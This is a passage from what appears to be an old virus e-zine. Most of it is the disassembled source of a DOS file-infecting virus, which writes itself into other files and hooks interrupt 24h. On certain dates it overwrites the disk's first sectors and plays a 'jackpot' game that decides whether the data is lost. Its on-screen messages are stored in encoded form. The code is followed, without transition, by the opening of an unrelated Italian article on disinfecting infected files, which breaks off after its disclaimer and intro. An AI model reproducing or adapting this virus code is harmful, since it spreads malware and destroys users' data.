mov ds:data_15e,es ; (6AE6:0043=6AE6h)
mov dx,4Eh
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,0Bh
mov cx,3Fh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_14 ; Jump if carry Set
mov dx,6Ch
call sub_1 ; (06EE)
cmp dl,1
jne loc_10 ; Jump if not equal
call sub_2 ; (073C)
jmp short loc_14 ; (069C)
db 90h
loc_10:
cmp dl,3
je loc_11 ; Jump if equal
jmp short loc_14 ; (069C)
db 90h
loc_11:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_12 ; Jump if carry=0
jmp short loc_14 ; (069C)
db 90h
loc_12:
mov dx,6Ch
call sub_1 ; (06EE)
cmp dl,1
jne loc_13 ; Jump if not equal
call sub_2 ; (073C)
jmp short loc_14 ; (069C)
db 90h
loc_13:
cmp dl,3
je loc_11 ; Jump if equal
loc_14:
mov dl,ds:data_12e ; (6AE6:003F=0)
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov dx,ds:data_14e ; (6AE6:0041=0)
mov bx,ds:data_15e ; (6AE6:0043=6AE6h)
mov ds,bx
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
loc_15:
mov ah,0
mov ds:data_13e,ah ; (6AE6:0040=0)
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
;* jmp far ptr loc_1 ;*(0273:1460)
db 0EAh, 60h, 14h, 73h, 2
db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh
db 0DAh, 0BAh, 20h, 0, 0B4h, 41h
db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh
db 21h, 8Ch, 6, 0D4h, 1, 89h
db 1Eh, 0D2h, 1, 0BAh, 82h, 0
db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh
db 1Bh, 0Ch, 0CDh
db 27h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_1 proc near
mov ax,ds:data_19e ; (6AE6:0068=0)
cmp ax,0F5B9h
ja loc_20 ; Jump if above
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
test cl,4
jnz loc_20 ; Jump if not zero
test cl,1
jz loc_16 ; Jump if zero
and cl,0FEh
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_16:
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov dx,3
mov cx,1
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jnc loc_17 ; Jump if carry=0
jmp short loc_19 ; (0732)
db 90h
loc_17:
cmp ax,0
jne loc_18 ; Jump if not equal
jmp short loc_19 ; (0732)
db 90h
loc_18:
mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0)
cmp al,90h
jne loc_21 ; Jump if not equal
loc_19:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_20:
mov dl,3
retn
loc_21:
mov dl,1
retn
sub_1 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_2 proc near
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ds:data_20e,dx ; (6AE6:007E=0)
mov ds:data_21e,cx ; (6AE6:0080=0)
push bx
call sub_5 ; (07FD)
mov bx,68h
mov ax,[bx]
mov dx,0
mov bx,10h
div bx ; ax,dx rem=dx:ax/reg
inc ax
mov ds:data_10e,ax ; (6AE6:003B=0)
mul bx ; dx:ax = reg * ax
mov ds:data_11e,ax ; (6AE6:003D=0)
pop bx
mov cx,ds:data_10e ; (6AE6:003B=0)
mov si,35Fh
mov [si],cx
mov cx,0
mov dx,0
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,605h
mov cx,4
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov cx,0
mov dx,ds:data_11e ; (6AE6:003D=0)
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,0
mov cx,91Ah
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
cmp ax,cx
jb loc_22 ; Jump if below
mov al,ds:data_18e ; (6AE6:004D=0)
cmp al,1
je loc_22 ; Jump if equal
mov cx,0
mov dx,0
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov si,9
mov ax,ds:data_11e ; (6AE6:003D=0)
add ax,35Ch
sub ax,4
mov [si],ax
mov dx,7
mov cx,4
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_22:
mov dx,ds:data_20e ; (6AE6:007E=0)
mov cx,ds:data_21e ; (6AE6:0080=0)
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
call sub_6 ; (0813)
retn
sub_2 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_3 proc near
push ax
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov dl,al
pop ax
mov dh,0
mov cl,1
mov ah,2
int 13h ; Disk dl=drive #: ah=func b2h
; read sectors to memory es:bx
retn
sub_3 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_4 proc near
push ax
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov dl,al
pop ax
mov dh,0
mov cl,1
mov ah,3
int 13h ; Disk dl=drive #: ah=func b3h
; write sectors from mem es:bx
retn
sub_4 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_5 proc near
mov ax,3524h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ds:data_16e,bx ; (6AE6:0045=0)
mov ds:data_17e,es ; (6AE6:0047=6AE6h)
mov dx,335h
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
retn
sub_5 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_6 proc near
mov dx,ds:data_16e ; (6AE6:0045=0)
mov cx,ds:data_17e ; (6AE6:0047=6AE6h)
push ds
push cx
pop ds
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
pop ds
retn
sub_6 endp

db 50h, 53h, 51h, 52h, 1Eh, 6
db 0B4h, 0, 0CDh, 13h, 0B4h, 1
db 88h, 26h, 4Dh, 0, 0BFh, 0FFh
db 0FFh, 8Eh, 6, 49h, 0, 8Bh
db 1Eh, 4Bh, 0, 0B0h, 0, 26h
db 88h, 7, 7, 1Fh, 5Ah, 59h
db 5Bh, 58h, 0CFh, 8Ch, 0CAh, 0B9h
db 3Fh, 0, 3, 0D1h, 83h, 0C2h
db 10h, 8Eh, 0DAh, 0A1h, 3Dh, 0
db 5, 3, 6, 0BBh, 0FEh, 0FFh
db 2Bh, 0D8h, 89h, 1Eh, 3, 6
db 0BBh, 5, 6, 8Ah, 7, 2Eh
db 0A2h, 0, 1, 43h, 8Ah, 7
db 2Eh, 0A2h, 1, 1, 43h, 8Ah
db 7, 2Eh, 0A2h, 2, 1, 43h
db 8Ah, 7, 2Eh, 0A2h, 3, 1
db 0B4h, 2Ah, 0CDh, 21h, 80h, 0FAh
db 0Fh, 74h, 3, 0E9h, 0A2h, 1
loc_23:
cmp dh,1
je loc_24 ; Jump if equal
cmp dh,4
je loc_24 ; Jump if equal
cmp dh,8
je loc_24 ; Jump if equal
jmp loc_36 ; (0A33)
loc_24:
call sub_8 ; (09EB)
push ds
pop es
mov si,613h
mov di,613h
mov cx,305h
cld ; Clear direction

locloop_25:
lodsb ; String [si] to al
sub al,64h ; 'd'
stosb ; Store al to es:[di]
loop locloop_25 ; Loop if cx > 0

mov dx,613h
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
loc_26:
mov ah,7
int 21h ; DOS Services ah=function 07h
; get keybd char al, no echo
mov byte ptr ds:data_2e,64h ; (0000:060D=0) 'd'
nop
mov byte ptr ds:data_3e,78h ; (0000:060E=0) 'x'
nop
mov byte ptr ds:data_4e,0B4h ; (0000:060F=0)
nop
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
mov bl,dh
mov bh,0
mov ch,0
mov dh,0
add cl,dl
mov ax,cx
mov cl,3
div cl ; al, ah rem = ax/reg
mov ds:data_5e,ah ; (0000:0610=0)
mov ax,dx
mov dl,3
div dl ; al, ah rem = ax/reg
mov ds:data_6e,ah ; (0000:0611=0)
mov ax,bx
div dl ; al, ah rem = ax/reg
mov ds:data_7e,ah ; (0000:0612=0)
dec byte ptr ds:data_1e ; (0000:060C=0)
mov al,ds:data_1e ; (0000:060C=0)
add al,30h ; '0'
mov dh,0Dh
mov dl,26h ; '&'
mov bx,0
mov ah,2
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov ah,0Eh
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
loc_27:
mov dx,1FFFh
loc_28:
nop
nop
nop
dec dx
jnz loc_28 ; Jump if not zero
mov al,ds:data_2e ; (0000:060D=0)
cmp al,ds:data_5e ; (0000:0610=0)
je loc_29 ; Jump if equal
mov dl,19h
mov al,ds:data_2e ; (0000:060D=0)
call sub_7 ; (09C9)
mov al,ds:data_2e ; (0000:060D=0)
dec al
mov ds:data_2e,al ; (0000:060D=0)
loc_29:
mov al,ds:data_3e ; (0000:060E=0)
cmp al,ds:data_6e ; (0000:0611=0)
je loc_30 ; Jump if equal
mov dl,21h ; '!'
mov al,ds:data_3e ; (0000:060E=0)
call sub_7 ; (09C9)
dec byte ptr ds:data_3e ; (0000:060E=0)
loc_30:
mov al,ds:data_4e ; (0000:060F=0)
cmp al,ds:data_7e ; (0000:0612=0)
je loc_31 ; Jump if equal
mov dl,29h ; ')'
mov al,ds:data_4e ; (0000:060F=0)
call sub_7 ; (09C9)
dec byte ptr ds:data_4e ; (0000:060F=0)
loc_31:
mov al,ds:data_4e ; (0000:060F=0)
cmp al,ds:data_7e ; (0000:0612=0)
jne loc_27 ; Jump if not equal
mov ah,ds:data_3e ; (0000:060E=0)
cmp ah,ds:data_6e ; (0000:0611=0)
jne loc_27 ; Jump if not equal
mov bl,ds:data_2e ; (0000:060D=0)
cmp bl,ds:data_5e ; (0000:0610=0)
jne loc_27 ; Jump if not equal
cmp al,0
jne loc_32 ; Jump if not equal
cmp ah,0
jne loc_32 ; Jump if not equal
cmp bl,0
jne loc_32 ; Jump if not equal
mov dx,80Ah
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
call sub_9 ; (0A18)
jmp short loc_35 ; (09C7)
db 90h
loc_32:
cmp al,1
jne loc_33 ; Jump if not equal
cmp ah,1
jne loc_33 ; Jump if not equal
cmp bl,1
jne loc_33 ; Jump if not equal
mov dx,88Dh
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
jmp short loc_34 ; (09BD)
db 90h
loc_33:
mov al,ds:data_1e ; (0000:060C=0)
cmp al,0
je loc_34 ; Jump if equal
jmp loc_26 ; (08BF)
loc_34:
mov dx,8D6h
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
jmp short loc_35 ; (09C7)
nop
loc_35:
jmp short loc_35 ; (09C7)

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_7 proc near
mov ah,0
push ax
mov dh,0Bh
mov ah,2
mov bh,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
pop ax
mov bl,3
div bl ; al, ah rem = ax/reg
mov bl,ah
mov bh,0
add bx,609h
mov al,[bx]
mov ah,0Eh
mov bx,0
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
retn
sub_7 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_8 proc near
push ds
mov bx,ds
add bx,1000h
mov ds,bx
mov bx,0
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cx,50h
mov dx,0
int 25h ; Absolute disk read, drive al
popf ; Pop flags
mov bx,0
mov ds,bx
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cx,50h
mov dx,0
int 26h ; Absolute disk write, drive al
popf ; Pop flags
pop ds
retn
sub_8 endp


;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ

sub_9 proc near
push ds
mov bx,ds
add bx,1000h
mov ds,bx
mov bx,0
mov ah,19h
int 21h ; DOS Services ah=function 19h
; get default drive al (0=a:)
mov cx,50h
mov dx,0
int 26h ; Absolute disk write, drive al
popf ; Pop flags
pop ds
retn
sub_9 endp

loc_36:
mov bx,0
mov ax,4B59h
int 21h ; DOS Services ah=function 4Bh
; run progm @ds:dx, parm @es:bx
cmp ax,666h
jne loc_37 ; Jump if not equal
jmp loc_41 ; (0AF0)
loc_37:
push ds
pop es
push ds
push cs
pop ds
mov si,0
mov di,917h
mov cx,100h
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop ds
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov ds:data_14e,bx ; (6AE6:0041=0)
mov ds:data_15e,es ; (6AE6:0043=6AE6h)
mov dx,4Eh
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,11h
mov cx,3Fh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_38 ; Jump if carry Set
mov dx,11h
call sub_1 ; (06EE)
cmp dl,1
jne loc_38 ; Jump if not equal
call sub_2 ; (073C)
loc_38:
call sub_5 ; (07FD)
mov dx,20h
mov cx,2
mov ah,3Ch ; '<'
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
jc loc_40 ; Jump if carry Set
mov bx,ax
mov dx,0
mov cx,91Ah
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
push ax
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
pop ax
cmp ax,cx
je loc_39 ; Jump if equal
mov dx,20h
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
jmp short loc_40 ; (0AD1)
db 90h
loc_39:
push cs
pop es
mov bx,cs:data_8e ; (6AE6:0002=0)
sub bx,92Ch
mov cx,cs
sub bx,cx
mov ah,4Ah ; 'J'
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov dx,20h
push ds
pop es
mov bx,2Dh
mov ax,4B00h
int 21h ; DOS Services ah=function 4Bh
; run progm @ds:dx, parm @es:bx
loc_40:
call sub_6 ; (0813)
push cs
pop es
mov di,0
mov si,917h
mov cx,0FFh
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov dx,ds:data_14e ; (6AE6:0041=0)
mov bx,ds:data_15e ; (6AE6:0043=6AE6h)
mov ds,bx
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
loc_41:
push cs
pop ds
jmp $-0F32h
jmp $+3DFh
db 48h, 9Bh, 9Ch, 3Fh, 5, 0Ah
db 5, 3, 1, 3, 0, 6Eh
db 71h, 6Dh, 6Dh, 84h, 84h, 84h
db 0A8h, 0ADh, 0B7h, 0AFh, 84h, 0A8h
db 0A9h, 0B7h, 0B8h, 0B6h, 0B3h, 0BDh
db 0A9h, 0B6h, 84h, 5Dh, 84h, 0A5h
db 84h, 0B7h, 0B3h, 0B9h, 0BAh, 0A9h
db 0B2h, 0ADh, 0B6h, 84h, 0B3h, 0AAh
db 84h, 0B1h, 0A5h, 0B0h, 0B8h, 0A5h
db 6Eh, 71h, 6Eh, 71h, 6Dh, 6Dh
db 0ADh, 84h, 0CCh, 0C5h, 0DAh, 0C9h
db 84h, 0CEh, 0D9h, 0D7h, 0D8h, 84h
db 0A8h, 0A9h, 0B7h, 0B8h, 0B6h, 0B3h
db 0BDh, 0A9h, 0A8h, 84h, 0D8h, 0CCh
db 0C9h, 84h, 0AAh, 0A5h, 0B8h, 84h
db 0D3h, 0D2h, 84h, 0DDh, 0D3h, 0D9h
db 0D6h, 84h, 0A8h, 0CDh, 0D7h, 0CFh
db 84h, 85h, 85h, 6Eh, 71h, 84h
db 84h, 84h, 84h, 84h, 84h, 0ACh
db 0D3h, 0DBh, 0C9h, 0DAh, 0C9h, 0D6h
db 90h, 84h, 0ADh, 84h, 0CCh, 0C5h
db 0DAh, 0C9h, 84h, 0C5h, 84h, 0C7h
db 0D3h, 0D4h, 0DDh, 84h, 0CDh, 0D2h
db 84h, 0B6h, 0A5h, 0B1h, 90h, 84h
db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h
db 0D1h, 84h, 0CBh, 0CDh, 0DAh, 0CDh
db 0D2h, 0CBh, 84h, 0DDh, 0D3h, 0D9h
db 84h, 0C5h, 84h, 0D0h, 0C5h, 0D7h
db 0D8h, 84h, 0C7h, 0CCh, 0C5h, 0D2h
db 0C7h, 0C9h, 6Eh, 71h, 6Dh, 6Dh
db 6Dh, 0D8h, 0D3h, 84h, 0D6h, 0C9h
db 0D7h, 0D8h, 0D3h, 0D6h, 0C9h, 84h
db 0DDh, 0D3h, 0D9h, 0D6h, 84h, 0D4h
db 0D6h, 0C9h, 0C7h, 0CDh, 0D3h, 0D9h
db 0D7h, 84h, 0C8h, 0C5h, 0D8h, 0C5h
db 92h, 6Eh, 71h, 84h, 84h, 84h
db 84h, 84h, 0BBh, 0A5h, 0B6h, 0B2h
db 0ADh, 0B2h, 0ABh, 9Eh, 84h, 0ADh
db 0AAh, 84h, 0BDh, 0B3h, 0B9h, 84h
db 0B6h, 0A9h, 0B7h, 0A9h, 0B8h, 84h
db 0B2h, 0B3h, 0BBh, 90h, 84h, 0A5h
db 0B0h, 0B0h, 84h, 0BDh, 0B3h, 0B9h
db 0B6h, 84h, 0A8h, 0A5h, 0B8h, 0A5h
db 84h, 0BBh, 0ADh, 0B0h, 0B0h, 84h
db 0A6h, 0A9h, 84h, 0B0h, 0B3h, 0B7h
db 0B8h, 84h, 91h, 84h, 0AAh, 0B3h
db 0B6h, 0A9h, 0BAh, 0A9h, 0B6h, 84h
db 85h, 85h, 6Eh, 71h, 6Dh, 6Dh
db 84h, 84h, 84h, 0BDh, 0D3h, 0D9h
db 0D6h, 84h, 0A8h, 0C5h, 0D8h, 0C5h
db 84h, 0C8h, 0C9h, 0D4h, 0C9h, 0D2h
db 0C8h, 0D7h, 84h, 0D3h, 0D2h, 84h
db 0C5h, 84h, 0CBh, 0C5h, 0D1h, 0C9h
db 84h, 0D3h, 0CAh, 84h, 0AEh, 0A5h
db 0A7h, 0AFh, 0B4h, 0B3h, 0B8h, 71h
db 6Eh, 71h, 6Eh, 6Dh, 6Dh, 84h
db 84h, 84h, 84h, 84h, 84h, 0A7h
db 0A5h, 0B7h, 0ADh, 0B2h, 0B3h, 84h
db 0A8h, 0A9h, 84h, 0B1h, 0A5h, 0B0h
db 0B8h, 0A9h, 84h, 0AEh, 0A5h, 0A7h
db 0AFh, 0B4h, 0B3h, 0B8h
db 'nqnqmmm-1'
db 1Fh, 6Dh, 2Dh, 31h, 1Fh, 6Dh
db 2Dh, 31h, 1Fh, 6Eh, 71h, 6Dh
db 6Dh, 6Dh, 3Bh, 0, 3Bh, 6Dh
db 3Bh, 0A3h, 3Bh, 6Dh, 3Bh, 0FFh
db ';nqmmm,1 m,1 m,1 nqmmm'
db 84h, 84h, 84h, 84h, 0A7h, 0B6h
db 0A9h, 0A8h, 0ADh, 0B8h, 0B7h, 84h
db 9Eh, 84h, 99h
db 'nqqnqnmmm'
db 0, 0, 0, 84h, 0A1h, 84h
db 0BDh, 0D3h, 0D9h, 0D6h, 84h, 0A8h
db 0CDh, 0D7h, 0CFh, 6Eh, 71h, 6Dh
db 6Dh, 6Dh, 0A3h, 0A3h, 0A3h, 84h
db 0A1h, 84h, 0B1h, 0DDh, 84h, 0B4h
db 0CCh, 0D3h, 0D2h, 0C9h, 84h, 0B2h
db 0D3h, 92h, 6Eh, 71h, 6Eh, 71h
db 6Dh, 6Dh, 6Dh, 0A5h, 0B2h, 0BDh
db 84h, 0AFh, 0A9h, 0BDh, 84h, 0B8h
db 0B3h, 84h, 0B4h, 0B0h, 0A5h, 0BDh
db 'qnqnqnqnqn'
db 88h, 6Eh, 71h, 0A6h, 0A5h, 0B7h
db 0B8h, 0A5h, 0B6h, 0A8h, 84h, 85h
db 84h, 0BDh, 0D3h, 0D9h, 0C4h, 0D6h
db 0C9h, 84h, 0D0h, 0D9h, 0C7h, 0CFh
db 0DDh, 84h, 0D8h, 0CCh, 0CDh, 0D7h
db 84h, 0D8h, 0CDh, 0D1h, 0C9h, 84h
db 91h, 84h, 0C6h, 0D9h, 0D8h, 84h
db 0CAh, 0D3h, 0D6h, 84h, 0DDh, 0D3h
db 0D9h, 0D6h, 84h, 0D3h, 0DBh, 0D2h
db 84h, 0D7h, 0C5h, 0CFh, 0C9h, 90h
db 84h, 0D2h, 0D3h, 0DBh, 6Eh, 71h
db 0B7h, 0BBh, 0ADh, 0B8h, 0A7h, 0ACh
db 84h, 0B3h, 0AAh, 0AAh, 84h, 0BDh
db 0B3h, 0B9h, 0B6h, 84h, 0A7h, 0B3h
db 0B1h, 0B4h, 0B9h, 0B8h, 0A9h, 0B6h
db 84h, 0A5h, 0B2h, 0A8h, 84h, 0A8h
db 0B3h, 0B2h, 0C4h, 0B8h, 84h, 0B8h
db 0B9h, 0B6h
loc_42:
mov dl,84h
lodsw ; String [si] to ax
mov ax,0B384h
mov dl,84h
mov ax,0B0ADh
mov al,84h
mov ax,0B1B3h
mov bl,0B6h
mov dh,0B3h
mov bx,8584h
test ax,ds:data_33e[di] ; (6AE6:716E=0)
mov [bp+71h],ch
mov dl,0D3h
test ch,[bp+si-3827h]
iret ; Interrupt return
db 0CDh, 0D2h, 0C4h, 84h, 0A7h, 0CCh
db 0C5h, 0D2h, 0C7h, 0C9h, 9Fh, 84h
db 0C5h, 0D2h, 0C8h, 84h, 0ADh, 0C4h
db 0D1h, 84h, 0D4h, 0D9h, 0D2h, 0CDh
db 0D7h, 0CCh, 0CDh, 0D2h, 0CBh, 84h
db 0DDh, 0D3h, 0D9h, 84h, 0CAh, 0D3h
db 0D6h, 84h, 0D8h, 0D6h, 0DDh, 0CDh
db 0D2h, 0CBh, 84h, 0D8h, 0D3h, 84h
db 0D8h, 0D6h, 0C5h, 0C7h, 0C9h, 84h
db 0D1h, 0C9h, 84h, 0C8h, 0D3h, 0DBh
db 0D2h, 84h, 85h, 88h, 6Eh, 71h
db 0ACh, 0A5h, 84h, 0ACh, 0A5h, 84h
db 85h, 85h, 84h, 0BDh, 0D3h, 0D9h
db 84h, 0C5h, 0D7h, 0D7h, 0CCh, 0D3h
db 0D0h, 0C9h, 90h, 84h, 0DDh, 0D3h
db 0D9h, 0C4h, 0DAh, 0C9h, 84h, 0D0h
db 0D3h, 0D7h, 0D8h, 9Eh, 84h, 0D7h
db 0C5h, 0DDh, 84h, 0A6h, 0DDh, 0C9h
db 84h, 0D8h, 0D3h, 84h, 0DDh, 0D3h
db 0D9h, 0D6h, 84h, 0A6h, 0C5h, 0D0h
db 0D0h, 0D7h, 84h, 92h, 92h, 92h
db 6Eh, 71h, 88h, 0CDh, 20h, 0

seg_a ends



end start

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ þ [Disinfettazione di un file infetto] UnDeR CoNsTrUcTiOn ³
³ [ViRiI SeCtIoN] Articolo di: Li-Nux ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

******************************************
** Disinfettazione di un File Infetto **
** **
** By Rock Steady/NuKE **
******************************************

Tradotto e modificato da: Li-Nux [UnDeR CoNsTrUcTiOn]

DISCLAIMER: Io, il traduttore e colui o coloro che hanno scritto l'articolo
o comunque hanno aiutato, non sono responsabili. NON MI PRENDO
RESPONSABILITA' PER L'UTILIZZO DI QUESTI DATI E PER I LORO
EVENTUALI DANNI DIRETTI ED INDIRETTI. IO LI-NUX, HO TRADOTTO
LA VERSIONE INGLESE E L'HO MODIFICATA PER RENDERE IL TESTO PIU'
ADATTO ALLA LINGUA ITALIANA. NON SONO RESPONSABILE IN ALCUNA
MANIERA. IO VIETO CHE QUESTO ARTICOLO VENGA POSTATO SU NEWSGROUP
SIA IN MANIERA INTEGRALE CHE PARZIALE. SE QUALCUNO LO FARA' SI
PRENDERA' TUTTE LE RESPONSABILITA'. QUESTO ARTICOLO E' STATO
CREATO PER LA E-ZINE DEL GRUPPO [UNDER CONSTRUCTION] !!!

NON FATE CAZZATE !!! RICORDOTE CHE I LAMER CHE FANNO CAZZATE
NON SOPRAVVIVONO...

------------------------------------------------------------------------------
Introduzione !!!

Beh, molti di voi si chiederanno, perchŠ mi devo scoglionare a tradurre
dall'inglese all'italiano per cercare di fare qualcosa in piu' ?
PerchŠ nessun gruppo di merda in Italia ci aiuta a noi che vogliamo capire
di piu' ? CAZZO QUANTE DOMANDE FATE !!! :)

